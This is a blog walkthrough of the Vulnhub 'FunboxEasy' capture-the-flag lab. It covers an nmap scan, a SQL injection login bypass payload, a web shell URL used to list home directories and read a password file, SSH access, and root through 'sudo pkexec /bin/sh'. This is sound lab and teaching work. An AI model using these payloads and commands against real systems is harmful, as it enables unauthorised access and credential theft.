Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

f1

Boot2Root ! Easy going, but with this Funbox you have to spend a bit more time. Much more, if you stuck in good traps. But most of the traps have hints, that they are traps. Vulnhub link to download FunboxEasy:- FunboxEasy

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

Nmap scan report for 192.168.250.111
Host is up (0.27s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_gym
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 17 04:15:11 2020 -- 1 IP address (1 host up) scanned in 67.65 seconds

Ok let hit the robots.txt on port 80.

f2

Gym let try to access it with the IP/gym

f3

I spend a little time trying to get the right credentials but no luck so i decided to burst some directorys with dirbuster i think the robots.txt is the first rabbit hole lol.

f4

Another dir let check it out.

f5

Small CRM Projects admin login page let try to check for some default credentials or maybe a vulnerable to get in.

f6

Description: There is a SQL injection vulnerability in the /index.php page which allows for an attacker to use the SQLi login bypass payload ‘=’‘or’ for both the username and password parameters, this allows for any authenticated or low level user to login to the admin account.

f7

Boom we are in but it just another rabbit hole 2 lol let enumerate more let go back to our dirbuster to check more dir.

f8

The store dir look interesting let hit it.

f9

Online book store by projectworlds pretty old also 2017 cool.

f10

Let download and try the exploit.

f11

Boom finally we are in.

f12

http://192.168.250.111/store/bootstrap/img/B8Wsi38YLp.php?cmd=ls -la /home

f13

http://192.168.250.111/store/bootstrap/img/B8Wsi38YLp.php?cmd=ls -la /home/tony

f14

http://192.168.250.111/store/bootstrap/img/B8Wsi38YLp.php?cmd=less /home/tony/password.txt

f15

Boom we have the ssh password also the username which is tony let hit ssh.

f16

ssh we are in first thing first let check sudo with sudo -l

f17

Plenty way to get root but let go with /usr/bin/pkexec let check GTFOBins

f18

Now let run sudo pkexec /bin/sh

f20

We are root Box Rooted.

Greeting From Muzec



Back To Home